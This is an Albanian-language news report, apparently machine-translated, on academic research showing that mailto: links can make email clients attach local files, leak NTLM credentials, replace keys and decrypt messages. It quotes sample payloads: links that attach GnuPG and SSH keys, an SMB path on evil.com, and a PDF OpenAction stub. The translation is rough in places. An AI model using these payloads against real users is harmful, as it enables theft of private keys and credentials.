Sulmimi i përdoruesve të klientëve të postës elektronike duke përdorur lidhjet "mailto:".

Studiues nga Universiteti Ruhr në Bochum (Gjermani) analizuar (PDF) sjellja e klientëve të postës kur përpunohen lidhjet "mailto:" me parametra të avancuar. Pesë nga njëzet klientët e-mail të ekzaminuar ishin të cenueshëm ndaj një sulmi që manipuloi zëvendësimin e burimeve duke përdorur parametrin "bashkëngjit". Gjashtë klientë të tjerë të postës elektronike ishin të cenueshëm ndaj një sulmi zëvendësues të çelësit PGP dhe S/MIME, dhe tre klientë ishin të prekshëm ndaj një sulmi për të nxjerrë përmbajtjen e mesazheve të koduara.

Lidhjet «mailto:"përdoren për të automatizuar hapjen e një klienti të postës elektronike në mënyrë që t'i shkruani një letër adresuesit të specifikuar në lidhje. Përveç adresës, mund të specifikoni parametra shtesë si pjesë e lidhjes, të tilla si subjekti i letrës dhe një shabllon për përmbajtjen tipike. Sulmi i propozuar manipulon parametrin "bashkëngjit", i cili ju lejon të bashkëngjitni një bashkëngjitje në mesazhin e gjeneruar.

Klientët e postës Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) dhe Pegasus Mail ishin të cenueshëm ndaj një sulmi të parëndësishëm që ju lejon të bashkëngjitni automatikisht çdo skedar lokal, i specifikuar nëpërmjet një lidhjeje si "mailto:?attach=path_to_file". Skedari është bashkangjitur pa shfaqur një paralajmërim, kështu që pa vëmendje të veçantë, përdoruesi mund të mos vërejë se letra do të dërgohet me një bashkëngjitje.

Për shembull, duke përdorur një lidhje si "mailto:[email mbrojtur]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ju mund të futni çelësat privatë nga GnuPG në shkronjë. Ju gjithashtu mund të dërgoni përmbajtjen e kuletave kripto (~/.bitcoin/wallet.dat), çelësat SSH (~/.ssh/id_rsa) dhe çdo skedar të aksesueshëm për përdoruesin. Për më tepër, Thunderbird ju lejon të bashkëngjitni grupe skedarësh me maskë duke përdorur konstruksione si "attach=/tmp/*.txt".

Përveç skedarëve lokalë, disa klientë të postës elektronike përpunojnë lidhje me ruajtjen e rrjetit dhe shtigjet në serverin IMAP. Në veçanti, IBM Notes ju lejon të transferoni një skedar nga një drejtori rrjeti kur përpunoni lidhje si "attach=\\evil.com\dummyfile", si dhe të përgjoni parametrat e vërtetimit të NTLM duke dërguar një lidhje në një server SMB të kontrolluar nga sulmuesi (kërkesa do të dërgohet me përdoruesin aktual të parametrave të vërtetimit).

Thunderbird përpunon me sukses kërkesat si “attach=imap:///fetch>UID>/INBOX>1/”, të cilat ju lejojnë të bashkëngjitni përmbajtje nga dosjet në serverin IMAP. Në të njëjtën kohë, mesazhet e marra nga IMAP, të koduara nëpërmjet OpenPGP dhe S/MIME, deshifrohen automatikisht nga klienti i postës përpara se të dërgohen. Zhvilluesit e Thunderbird ishin njoftuar për problemin në shkurt dhe në numrin Thunderbird 78 problemi tashmë është rregulluar (degët 52, 60 dhe 68 të Thunderbird mbeten të pambrojtura).

Versionet e vjetra të Thunderbird ishin gjithashtu të prekshme ndaj dy varianteve të tjera të sulmit në PGP dhe S/MIME të propozuara nga studiuesit. Në veçanti, Thunderbird, si dhe OutLook, PostBox, eM Client, MailMate dhe R2Mail2, iu nënshtruan një sulmi të zëvendësimit të çelësit, i shkaktuar nga fakti se klienti i postës importon dhe instalon automatikisht certifikata të reja të transmetuara në mesazhet S/MIME, gjë që lejon sulmuesi të organizojë zëvendësimin e çelësave publikë të ruajtur tashmë nga përdoruesi.

Sulmi i dytë, ndaj të cilit janë të ndjeshëm Thunderbird, PostBox dhe MailMate, manipulon tiparet e mekanizmit për ruajtjen automatike të mesazheve draft dhe lejon, duke përdorur parametrat mailto, të fillojë deshifrimin e mesazheve të koduara ose shtimin e një nënshkrimi dixhital për mesazhe arbitrare, me transmetimi i mëvonshëm i rezultatit në serverin IMAP të sulmuesit. Në këtë sulm, teksti i koduar transmetohet përmes parametrit "trupi" dhe etiketa "meta refresh" përdoret për të nisur një thirrje në serverin IMAP të sulmuesit. Për shembull: ' '

Për të përpunuar automatikisht lidhjet "mailto:" pa ndërveprim të përdoruesit, mund të përdoren dokumente PDF të krijuara posaçërisht - veprimi OpenAction në PDF ju lejon të nisni automatikisht mbajtësin mailto kur hapni një dokument:

%PDF-1.5
1 0 obj
<< /Lloji /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——FILLO MESAZH PGP——[…])>>
endobj

Sulmimi i përdoruesve të klientëve të postës elektronike duke përdorur lidhjet "mailto:".

Burimi: opennet.ru

Shto një koment